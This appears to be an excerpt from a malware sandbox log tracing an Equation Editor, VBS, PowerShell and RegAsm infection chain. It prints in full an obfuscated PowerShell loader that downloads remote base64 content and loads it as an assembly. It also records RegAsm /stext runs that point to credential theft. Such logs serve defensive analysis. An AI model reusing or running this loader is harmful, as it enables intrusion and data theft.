                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
